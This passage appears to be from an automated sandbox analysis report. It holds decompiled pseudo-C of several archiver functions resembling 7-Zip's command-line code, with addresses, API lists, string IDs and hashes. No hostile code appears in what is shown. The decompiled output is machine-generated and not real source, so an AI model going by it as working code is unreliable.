											_t58 = E00B123F5( *((intOrPtr*)(_t110 - 0x1c)), "mtf");
											__eflags = _t58;
											if(_t58 == 0) {
												_t59 = E00B123F5( *((intOrPtr*)(_t110 - 0x1c)), "qs");
												__eflags = _t59;
												if(_t59 == 0) {
													goto L35;
												}
												_t98 = _t106 + 0x7a;
												L34:
												_t83 = _t104;
												L11:
												_t46 = L00B1D011(_t83, _t98);
												goto L36;
											}
											_t98 = _t106 + 0x8e;
											goto L34;
										}
										_t46 = L00B4FA0A(_t106 + 0x8c, __eflags);
										goto L36;
									}
									_t109 =  *((intOrPtr*)(_t106 + 0x88));
									__eflags = _t109 - 0xffffffff;
									if(_t109 == 0xffffffff) {
										L20:
										_t107 = 0;
										goto L37;
									}
									__eflags = _t109;
									if(_t109 == 0) {
										goto L20;
									}
									__eflags = _t109 - 3;
									if(_t109 == 3) {
										goto L20;
									}
									__eflags = _t109 - 0x17;
									if(_t109 == 0x17) {
										goto L20;
									}
									goto L5;
								}
								_t46 = L00B1D011( *((intOrPtr*)(_t110 + 0xc)), _t106 + 0x7d);
								__eflags = _t46;
								if(_t46 != 0) {
									goto L36;
								}
								 *((char*)(_t106 + 0x7c)) = 1;
								goto L20;
							}
							 *(_t110 + 0xb) = 1;
							_t46 = L00B1D011( *((intOrPtr*)(_t110 + 0xc)), _t110 + 0xb);
							__eflags = _t46;
							if(_t46 == 0) {
								asm("sbb eax, eax");
								_t46 = ( ~( *(_t110 + 0xb)) & 0x7ff8ffa9) + 0x80070057;
							}
							goto L36;
						}
						_t98 = _t106 + 0x7b;
						L10:
						_t83 =  *((intOrPtr*)(_t110 + 0xc));
						goto L11;
					}
					_t98 = _t106 + 0x8f;
					goto L10;
				}
				L00B134EF(_t110 - 0x1c, 0);
				if( *((intOrPtr*)(_t110 - 0x18)) != 0) {
					_t46 =  *((intOrPtr*)(_t110 + 0xc));
					__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t110 + 0xc))));
					if(__eflags == 0) {
						_t46 = E00B5A536(__ecx, __eflags, _t110 - 0x1c);
						goto L36;
					}
					goto L5;
				}
				_push( *((intOrPtr*)(_t110 + 0xc)));
				_t46 = E00B5A642(__ecx);
				goto L36;
			}
















                                                                                                                    0x00b5a6f4
                                                                                                                    0x00b5a6ff
                                                                                                                    0x00b5a707
                                                                                                                    0x00b5a711
                                                                                                                    0x00b5a714
                                                                                                                    0x00b5a71c
                                                                                                                    0x00b5a74c
                                                                                                                    0x00b5a74c
                                                                                                                    0x00b5a8c3
                                                                                                                    0x00b5a8c6
                                                                                                                    0x00b5a8d4
                                                                                                                    0x00b5a8dc
                                                                                                                    0x00b5a8dc
                                                                                                                    0x00b5a725
                                                                                                                    0x00b5a76c
                                                                                                                    0x00b5a771
                                                                                                                    0x00b5a774
                                                                                                                    0x00b5a776
                                                                                                                    0x00b5a8b6
                                                                                                                    0x00b5a8b6
                                                                                                                    0x00b5a8b9
                                                                                                                    0x00b5a8bc
                                                                                                                    0x00b5a8c1
                                                                                                                    0x00b5a8c1
                                                                                                                    0x00000000
                                                                                                                    0x00b5a8c1
                                                                                                                    0x00b5a784
                                                                                                                    0x00b5a789
                                                                                                                    0x00b5a78b
                                                                                                                    0x00b5a7a8
                                                                                                                    0x00b5a7ad
                                                                                                                    0x00b5a7af
                                                                                                                    0x00b5a7be
                                                                                                                    0x00b5a7c3
                                                                                                                    0x00b5a7c5
                                                                                                                    0x00b5a7fc
                                                                                                                    0x00b5a801
                                                                                                                    0x00b5a803
                                                                                                                    0x00b5a82c
                                                                                                                    0x00b5a830
                                                                                                                    0x00b5a831
                                                                                                                    0x00b5a832
                                                                                                                    0x00b5a837
                                                                                                                    0x00b5a839
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5a83f
                                                                                                                    0x00b5a842
                                                                                                                    0x00b5a86f
                                                                                                                    0x00b5a871
                                                                                                                    0x00b5a88a
                                                                                                                    0x00b5a88f
                                                                                                                    0x00b5a891
                                                                                                                    0x00b5a8a3
                                                                                                                    0x00b5a8a8
                                                                                                                    0x00b5a8aa
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5a8ac
                                                                                                                    0x00b5a8af
                                                                                                                    0x00b5a8af
                                                                                                                    0x00b5a796
                                                                                                                    0x00b5a796
                                                                                                                    0x00000000
                                                                                                                    0x00b5a796
                                                                                                                    0x00b5a893
                                                                                                                    0x00000000
                                                                                                                    0x00b5a893
                                                                                                                    0x00b5a87b
                                                                                                                    0x00000000
                                                                                                                    0x00b5a87b
                                                                                                                    0x00b5a844
                                                                                                                    0x00b5a84a
                                                                                                                    0x00b5a84d
                                                                                                                    0x00b5a81c
                                                                                                                    0x00b5a81c
                                                                                                                    0x00000000
                                                                                                                    0x00b5a81c
                                                                                                                    0x00b5a84f
                                                                                                                    0x00b5a851
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5a853
                                                                                                                    0x00b5a856
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5a858
                                                                                                                    0x00b5a85b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5a85d
                                                                                                                    0x00b5a80b
                                                                                                                    0x00b5a810
                                                                                                                    0x00b5a812
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5a818
                                                                                                                    0x00000000
                                                                                                                    0x00b5a818
                                                                                                                    0x00b5a7cd
                                                                                                                    0x00b5a7d1
                                                                                                                    0x00b5a7d6
                                                                                                                    0x00b5a7d8
                                                                                                                    0x00b5a7e3
                                                                                                                    0x00b5a7ea
                                                                                                                    0x00b5a7ea
                                                                                                                    0x00000000
                                                                                                                    0x00b5a7d8
                                                                                                                    0x00b5a7b1
                                                                                                                    0x00b5a793
                                                                                                                    0x00b5a793
                                                                                                                    0x00000000
                                                                                                                    0x00b5a793
                                                                                                                    0x00b5a78d
                                                                                                                    0x00000000
                                                                                                                    0x00b5a78d
                                                                                                                    0x00b5a72b
                                                                                                                    0x00b5a733
                                                                                                                    0x00b5a744
                                                                                                                    0x00b5a747
                                                                                                                    0x00b5a74a
                                                                                                                    0x00b5a75c
                                                                                                                    0x00000000
                                                                                                                    0x00b5a75c
                                                                                                                    0x00000000
                                                                                                                    0x00b5a74a
                                                                                                                    0x00b5a735
                                                                                                                    0x00b5a73a
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B5A6F4
                                                                                                                      • Part of subcall function 00B134EF: memmove.MSVCRT ref: 00B13514
                                                                                                                      • Part of subcall function 00B5A642: __EH_prolog.LIBCMT ref: 00B5A647
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$memmove
                                                                                                                    • String ID: hcf$mtf$rsfx
                                                                                                                    • API String ID: 593149739-3699647704
                                                                                                                    • Opcode ID: 451ece31cbcfea6d011d9395dcd207f94c2707e6fd93be19d4a0a019ca00e72f
                                                                                                                    • Instruction ID: 1d3cfdd5d0ab63a3906c8192b7c65752342306fc153a3f6268f354929ee6bfbc
                                                                                                                    • Opcode Fuzzy Hash: 451ece31cbcfea6d011d9395dcd207f94c2707e6fd93be19d4a0a019ca00e72f
                                                                                                                    • Instruction Fuzzy Hash: A0519F319001058ACF24EB64D4D07FEB7E2EB48305F54C6E9EC666B291DA349D4EDB52
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4C2D1 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 83COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E00B4C2D1(void* __ecx, void* __ebp) {
				intOrPtr _v0;
				char* _t64;
				char** _t65;
				struct _IO_FILE** _t66;
				void* _t67;

				_t67 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xc8)) <= 0 ||  *(__ecx + 0xb8) == 0) {
					L7:
					_t64 = _t67 + 0x120;
					if( *((intOrPtr*)(_t67 + 0x120)) != 0) {
						 *((intOrPtr*)(_t67 + 0x18)) =  *((intOrPtr*)(_t67 + 0x18)) + 1;
						asm("adc [esi+0x1c], ebx");
					} else {
						if( *((intOrPtr*)(_t67 + 0xac)) != 0) {
							L00B4B5F1(_t67 + 8);
						}
						 *_t64 = 1;
					}
					if( *((intOrPtr*)(_t67 + 0xac)) != 0) {
						E00B1275A(_t67 + 0x20, "Removing");
						L00B12F78(_t67 + 0x2c, _v0);
						E00B4B752(_t67 + 8);
					}
					return 0;
				} else {
					L00B45BF1(__ecx + 8);
					if( *((intOrPtr*)(__ecx + 0x120)) == 0) {
						_t66 =  *(__ecx + 0xb8);
						if(_t66 != 0) {
							E00B11FE9(_t66);
							fputs(": Removing files after including to archive",  *_t66);
							E00B11FE9(_t66);
						}
					}
					_t65 = _t67 + 0xcc;
					E00B1275A(_t65, "Removing");
					E00B12869();
					fputs( *_t65,  *( *(_t67 + 0xb8)));
					_t70 = _t67 + 0xd8;
					L00B12F78(_t67 + 0xd8, _v0);
					E00B120E3( *(_t67 + 0xb8), _t70);
					E00B12059( *(_t67 + 0xb8), _t70, _t65);
					E00B11FE9( *(_t67 + 0xb8));
					if( *((intOrPtr*)(_t67 + 0xc1)) != 0) {
						L00B11FDA( *(_t67 + 0xb8));
					}
					goto L7;
				}
			}








                                                                                                                    0x00b4c2d3
                                                                                                                    0x00b4c2de
                                                                                                                    0x00b4c39a
                                                                                                                    0x00b4c3a0
                                                                                                                    0x00b4c3a6
                                                                                                                    0x00b4c3bd
                                                                                                                    0x00b4c3c1
                                                                                                                    0x00b4c3a8
                                                                                                                    0x00b4c3ae
                                                                                                                    0x00b4c3b3
                                                                                                                    0x00b4c3b3
                                                                                                                    0x00b4c3b8
                                                                                                                    0x00b4c3b8
                                                                                                                    0x00b4c3ca
                                                                                                                    0x00b4c3d4
                                                                                                                    0x00b4c3e0
                                                                                                                    0x00b4c3e8
                                                                                                                    0x00b4c3e8
                                                                                                                    0x00b4c3f2
                                                                                                                    0x00b4c2f0
                                                                                                                    0x00b4c2f4
                                                                                                                    0x00b4c305
                                                                                                                    0x00b4c307
                                                                                                                    0x00b4c30f
                                                                                                                    0x00b4c313
                                                                                                                    0x00b4c31f
                                                                                                                    0x00b4c325
                                                                                                                    0x00b4c325
                                                                                                                    0x00b4c30f
                                                                                                                    0x00b4c32a
                                                                                                                    0x00b4c337
                                                                                                                    0x00b4c33e
                                                                                                                    0x00b4c34d
                                                                                                                    0x00b4c350
                                                                                                                    0x00b4c35d
                                                                                                                    0x00b4c369
                                                                                                                    0x00b4c376
                                                                                                                    0x00b4c381
                                                                                                                    0x00b4c38d
                                                                                                                    0x00b4c395
                                                                                                                    0x00b4c395
                                                                                                                    0x00000000
                                                                                                                    0x00b4c38d

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fputs$fputc
                                                                                                                    • String ID: : Removing files after including to archive$Removing
                                                                                                                    • API String ID: 1185151155-1218467041
                                                                                                                    • Opcode ID: b636230d1d4bc6b2fdc4cd95b69feefae581e6714d63688e8855822d1703ea04
                                                                                                                    • Instruction ID: 9ef2e1d494872443ad2faf256a457e8748b134775433aeb64c7babcb480e9915
                                                                                                                    • Opcode Fuzzy Hash: b636230d1d4bc6b2fdc4cd95b69feefae581e6714d63688e8855822d1703ea04
                                                                                                                    • Instruction Fuzzy Hash: 4D31A4321017019BC7A5EF60D891AEAB7E5EF45300F4089AEE1AB02062DF30799ADB15
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4C88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E00B4C88A(void* __ecx) {
				void* __edi;
				void* _t40;
				struct _IO_FILE** _t54;
				void* _t57;
				void* _t59;

				L00B7F140(E00B86978, _t59);
				_t57 = __ecx;
				if( *((intOrPtr*)(_t59 + 8)) != 0) {
					_t40 = __ecx + 8;
					if( *((intOrPtr*)(__ecx + 0xac)) != 0) {
						E00B4B618(_t40, 0, 1);
					}
					if( *(_t57 + 0xbc) != 0) {
						_t41 =  *((intOrPtr*)(_t57 + 0xb8));
						if( *((intOrPtr*)(_t57 + 0xb8)) != 0) {
							L00B11FDA(_t41);
						}
						E00B126D9(_t59 - 0x18);
						 *((intOrPtr*)(_t59 - 4)) = 0;
						E00B44BDB( *((intOrPtr*)(_t59 + 8)),  *((intOrPtr*)(_t59 + 0xc)), _t59, _t59 - 0x18);
						_t54 =  *(_t57 + 0xbc);
						fputs( *(_t59 - 0x18),  *_t54);
						fputs(" : ",  *_t54);
						E00B11FE9(_t54);
						_push( *((intOrPtr*)(_t59 + 0x10)));
						E00B12163( *(_t57 + 0xbc));
						E00B11FE9( *(_t57 + 0xbc));
						E00B11FE9( *(_t57 + 0xbc));
						E00B11E89(L00B11FDA( *(_t57 + 0xbc)),  *(_t59 - 0x18));
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
				return 0;
			}








                                                                                                                    0x00b4c88f
                                                                                                                    0x00b4c89b
                                                                                                                    0x00b4c8a0
                                                                                                                    0x00b4c8ac
                                                                                                                    0x00b4c8af
                                                                                                                    0x00b4c8b3
                                                                                                                    0x00b4c8b3
                                                                                                                    0x00b4c8be
                                                                                                                    0x00b4c8c4
                                                                                                                    0x00b4c8cc
                                                                                                                    0x00b4c8ce
                                                                                                                    0x00b4c8ce
                                                                                                                    0x00b4c8d7
                                                                                                                    0x00b4c8e5
                                                                                                                    0x00b4c8e9
                                                                                                                    0x00b4c8ee
                                                                                                                    0x00b4c8ff
                                                                                                                    0x00b4c908
                                                                                                                    0x00b4c90f
                                                                                                                    0x00b4c914
                                                                                                                    0x00b4c91d
                                                                                                                    0x00b4c92a
                                                                                                                    0x00b4c931
                                                                                                                    0x00b4c944
                                                                                                                    0x00b4c94a
                                                                                                                    0x00b4c8be
                                                                                                                    0x00b4c952
                                                                                                                    0x00b4c95a

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fputs$H_prolog
                                                                                                                    • String ID: :
                                                                                                                    • API String ID: 2614055831-3653984579
                                                                                                                    • Opcode ID: 14542a12b898d158c69f97d1681bf44af65aeddbc9c742b18990b8659bd383b7
                                                                                                                    • Instruction ID: ecb9b483735ffef382fc0997e12ffd93782a0d0c935a9f90f0059888ed10fbb8
                                                                                                                    • Opcode Fuzzy Hash: 14542a12b898d158c69f97d1681bf44af65aeddbc9c742b18990b8659bd383b7
                                                                                                                    • Instruction Fuzzy Hash: 5011B431500605DBCB15EFA5C882EFEBBE6EF80710F10445EE91653251DB30A991DB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4A393 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 81%
                                                                                                                    			E00B4A393(char __edx) {
				char _v8;
				void* __ecx;
				int _t6;
				char* _t13;
				void* _t14;
				intOrPtr _t15;
				struct _IO_FILE** _t17;
				char _t24;
				void* _t25;
				struct _IO_FILE** _t30;
				void* _t31;
				struct _IO_FILE** _t32;

				_t24 = __edx;
				_push(_t17);
				_t30 =  *0xb9a898; // 0xb9a5a0
				_v8 = __edx;
				_t13 = _t17;
				if(_t30 != 0) {
					E00B11FE9(_t30);
					fputs("ERROR: ",  *_t30);
					fputs(_t13,  *_t30);
					_t17 = _t30;
					E00B11FE9(_t17);
					_t25 = _t25;
				}
				_t6 =  &_v8;
				L00B7F160();
				_t31 = _t6;
				_t14 = 0xb96090;
				_push(_t14);
				_push(_t31);
				_t32 = _t17;
				_push(_t25);
				_t15 = _t24;
				if(_t32 != 0) {
					fputs( *0xb8d3d0,  *_t32); // executed
					_t6 = E00B11FE9(_t32);
					if(_t15 != 0) {
						_t6 = fputs( *0xb8d3d4,  *_t32);
					}
				}
				return _t6;
			}















                                                                                                                    0x00b4a393
                                                                                                                    0x00b4a396
                                                                                                                    0x00b4a399
                                                                                                                    0x00b4a39f
                                                                                                                    0x00b4a3a4
                                                                                                                    0x00b4a3a6
                                                                                                                    0x00b4a3ab
                                                                                                                    0x00b4a3bd
                                                                                                                    0x00b4a3c2
                                                                                                                    0x00b4a3c7
                                                                                                                    0x00b4a3c9
                                                                                                                    0x00b4a3ce
                                                                                                                    0x00b4a3ce
                                                                                                                    0x00b4a3da
                                                                                                                    0x00b4a3de
                                                                                                                    0x00b4a3e3
                                                                                                                    0x00b4a3e4
                                                                                                                    0x00b4a3e5
                                                                                                                    0x00b4a3e6
                                                                                                                    0x00b4a3e7
                                                                                                                    0x00b4a3e9
                                                                                                                    0x00b4a3ec
                                                                                                                    0x00b4a3ee
                                                                                                                    0x00b4a3fe
                                                                                                                    0x00b4a404
                                                                                                                    0x00b4a40b
                                                                                                                    0x00b4a415
                                                                                                                    0x00b4a418
                                                                                                                    0x00b4a40b
                                                                                                                    0x00b4a41c

                                                                                                                    APIs
                                                                                                                    • _CxxThrowException.MSVCRT(?,00B96090), ref: 00B4A3DE
                                                                                                                      • Part of subcall function 00B11FE9: fputc.MSVCRT ref: 00B11FF0
                                                                                                                    • fputs.MSVCRT ref: 00B4A3BD
                                                                                                                    • fputs.MSVCRT ref: 00B4A3C2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fputs$ExceptionThrowfputc
                                                                                                                    • String ID: ERROR:
                                                                                                                    • API String ID: 2339886702-977468659
                                                                                                                    • Opcode ID: 20905b08538be448f647e2d192645055c43af9cc7206b36aae4864cf5369c182
                                                                                                                    • Instruction ID: 211931cff9c5aa68d22f4178872c845cecf18e8173db365d77c662fdc151ad17
                                                                                                                    • Opcode Fuzzy Hash: 20905b08538be448f647e2d192645055c43af9cc7206b36aae4864cf5369c182
                                                                                                                    • Instruction Fuzzy Hash: 7BF0A072A01218BB8B01BBDCCC91CAEB7ECEF8871071104AAF501A3261DA716E419BE1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4603E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B4603E(void* __ecx, void* __eflags, char* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v34;
				char _v35;
				char _v36;
				struct _IO_FILE** _t19;

				_v36 = 0x3a;
				_v35 = 0x20;
				L00B11944( &_v34, _a8, _a12);
				_t19 =  *(__ecx + 0xb8);
				fputs(_a4,  *_t19);
				fputs( &_v36,  *_t19);
				return E00B11FE9(_t19);
			}







                                                                                                                    0x00b4604e
                                                                                                                    0x00b46055
                                                                                                                    0x00b46059
                                                                                                                    0x00b4605e
                                                                                                                    0x00b4606f
                                                                                                                    0x00b46077
                                                                                                                    0x00b46086

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fputs$fputc
                                                                                                                    • String ID: $:
                                                                                                                    • API String ID: 1185151155-4041779174
                                                                                                                    • Opcode ID: b4abe7b6d94e0885dc28373bdea5a429e26a7ab44d865e8666c38e96c160b1e1
                                                                                                                    • Instruction ID: 612d02ba3418c64e40e5e4136bd14ef4659a5fe28bec99381ede4147bd5d8061
                                                                                                                    • Opcode Fuzzy Hash: b4abe7b6d94e0885dc28373bdea5a429e26a7ab44d865e8666c38e96c160b1e1
                                                                                                                    • Instruction Fuzzy Hash: EAF0A731500258ABCF11BF94CC05DDE7F79EF98314F050459ED9133251D7349555CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B3C983 Relevance: 6.3, APIs: 5, Instructions: 68COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 60%
                                                                                                                    			E00B3C983(void* __eax, signed int _a4, intOrPtr _a8, signed int* _a12) {
				signed int _t13;
				signed int _t16;
				signed int _t19;
				intOrPtr _t20;
				signed int* _t21;

				_t21 = _a12;
				_t20 = _a8;
				 *_t21 =  *_t21 & 0x00000000;
				_push(0x10);
				_push(0xb8fe10);
				_push(_t20);
				L00B7F304();
				if(__eax != 0) {
					_push(0x10);
					_push(0xb8d080);
					_push(_t20);
					L00B7F304();
					if(__eax == 0) {
						goto L1;
					}
					_push(0x10);
					_push(0xb8d0b0);
					_push(_t20);
					L00B7F304();
					if(__eax != 0) {
						_push(0x10);
						_push(0xb8d0d0);
						_push(_t20);
						L00B7F304();
						if(__eax != 0) {
							_push(0x10);
							_push(0xb8d1a0);
							_push(_t20);
							L00B7F304();
							if(__eax != 0) {
								return 0x80004002;
							}
							_t13 = _a4;
							_t16 = _t13;
							_t19 = _t13 + 0xc;
							L9:
							asm("sbb ecx, ecx");
							 *_t21 =  ~_t16 & _t19;
							L10:
							 *((intOrPtr*)(_t13 + 0x14)) =  *((intOrPtr*)(_t13 + 0x14)) + 1;
							return 0;
						}
						_t13 = _a4;
						_t16 = _t13;
						_t19 = _t13 + 8;
						goto L9;
					}
					_t13 = _a4;
					_t16 = _t13;
					_t19 = _t13 + 4;
					goto L9;
				}
				L1:
				_t13 = _a4;
				 *_t21 = _t13;
				goto L10;
			}








                                                                                                                    0x00b3c987
                                                                                                                    0x00b3c98b
                                                                                                                    0x00b3c98e
                                                                                                                    0x00b3c991
                                                                                                                    0x00b3c993
                                                                                                                    0x00b3c998
                                                                                                                    0x00b3c999
                                                                                                                    0x00b3c9a3
                                                                                                                    0x00b3c9ac
                                                                                                                    0x00b3c9ae
                                                                                                                    0x00b3c9b3
                                                                                                                    0x00b3c9b4
                                                                                                                    0x00b3c9be
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3c9c0
                                                                                                                    0x00b3c9c2
                                                                                                                    0x00b3c9c7
                                                                                                                    0x00b3c9c8
                                                                                                                    0x00b3c9d2
                                                                                                                    0x00b3c9de
                                                                                                                    0x00b3c9e0
                                                                                                                    0x00b3c9e5
                                                                                                                    0x00b3c9e6
                                                                                                                    0x00b3c9f0
                                                                                                                    0x00b3c9fc
                                                                                                                    0x00b3c9fe
                                                                                                                    0x00b3ca03
                                                                                                                    0x00b3ca04
                                                                                                                    0x00b3ca0e
                                                                                                                    0x00000000
                                                                                                                    0x00b3ca27
                                                                                                                    0x00b3ca10
                                                                                                                    0x00b3ca13
                                                                                                                    0x00b3ca15
                                                                                                                    0x00b3ca18
                                                                                                                    0x00b3ca1a
                                                                                                                    0x00b3ca1e
                                                                                                                    0x00b3ca20
                                                                                                                    0x00b3ca20
                                                                                                                    0x00000000
                                                                                                                    0x00b3ca23
                                                                                                                    0x00b3c9f2
                                                                                                                    0x00b3c9f5
                                                                                                                    0x00b3c9f7
                                                                                                                    0x00000000
                                                                                                                    0x00b3c9f7
                                                                                                                    0x00b3c9d4
                                                                                                                    0x00b3c9d7
                                                                                                                    0x00b3c9d9
                                                                                                                    0x00000000
                                                                                                                    0x00b3c9d9
                                                                                                                    0x00b3c9a5
                                                                                                                    0x00b3c9a5
                                                                                                                    0x00b3c9a8
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1475443563-0
                                                                                                                    • Opcode ID: bca16358a2d541c73bdbeacd3b4de482120669711e4f4c90c90a6557b3395ab0
                                                                                                                    • Instruction ID: d47ca6b83ecbf8b336d6fbfdfa44efd1ff11f0c9f8b8ae6bae323cff7dfc5d5f
                                                                                                                    • Opcode Fuzzy Hash: bca16358a2d541c73bdbeacd3b4de482120669711e4f4c90c90a6557b3395ab0
                                                                                                                    • Instruction Fuzzy Hash: 621134313402097BE710AF10CC42FBA37E48B54700F2285BAFD89FA292F2A0F950939C
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4C665 Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 97%
                                                                                                                    			E00B4C665(void* __ecx) {
				void* _t39;
				intOrPtr* _t65;
				char** _t81;
				void* _t84;
				void* _t87;

				L00B7F140(E00B86964, _t87);
				_push(__ecx);
				_t84 = __ecx;
				 *(_t87 - 0x10) = 0xb9a8a0;
				EnterCriticalSection(0xb9a8a0);
				 *((intOrPtr*)(_t87 - 4)) = 0;
				if( *((intOrPtr*)(_t87 + 0x14)) == 0 ||  *(_t84 + 0xb0) == 0) {
					 *((char*)(_t87 + 0x17)) = 0;
				} else {
					 *((char*)(_t87 + 0x17)) = 1;
					L00B45BF1(_t84);
					_t81 = _t84 + 0xc4;
					E00B1275A(_t81,  *((intOrPtr*)(_t87 + 0x10)));
					if( *((intOrPtr*)(_t87 + 8)) != 0) {
						E00B12869();
					}
					fputs( *_t81,  *( *(_t84 + 0xb0)));
